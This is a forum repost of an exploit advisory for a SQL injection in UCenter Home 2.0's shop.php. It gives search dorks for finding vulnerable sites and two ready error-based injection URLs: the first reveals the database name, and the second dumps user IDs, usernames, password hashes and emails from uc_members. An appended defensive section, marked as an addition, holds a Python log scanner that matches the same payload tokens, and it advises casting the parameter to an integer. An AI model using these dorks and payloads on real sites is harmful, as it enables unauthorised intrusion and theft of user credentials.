中国网络渗透测试联盟

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

your edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
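
A defender-side check for the request pattern in this advisory, as an added example that is not part of the original post: it scans web access logs for shop.php?ac=view requests whose shopid is not a plain integer or carries tokens from the quoted payloads. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Tokens taken from the payloads quoted in the advisory above.
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(", "unhex(", "uc_members")
# Request part of a combined-format access log line (log layout is an assumption).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/2013:21:31:00 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Feb/2013:21:32:10 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.5 - - [27/Feb/2013:21:33:00 +0800] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 400',
    '192.0.2.10 - - [27/Feb/2013:21:34:00 +0800] "GET /space.php?uid=1 HTTP/1.1" 200 100',
]

def classify_shopid(url):
    """Return None for unrelated requests, else (verdict, matched markers)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    if not parts.path.lower().endswith("/shop.php") or "view" not in query.get("ac", []):
        return None
    verdict, hits = "ok", []
    for value in query.get("shopid", []):
        if not re.fullmatch(r"\d{1,10}", value):  # a shop id should be a plain integer
            verdict = "non-numeric"
        hits += [m for m in MARKERS if m in value.lower()]
    if hits:
        verdict = "sqli-markers"
    return verdict, sorted(set(hits))

def scan(lines):
    """Return (client, status, verdict, markers) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        result = classify_shopid(url)
        if result and result[0] != "ok":
            findings.append((ip, int(status), result[0], result[1]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule applies on the server side: a shopid that is cast to an integer before it reaches the query cannot carry the quoted payloads.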





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2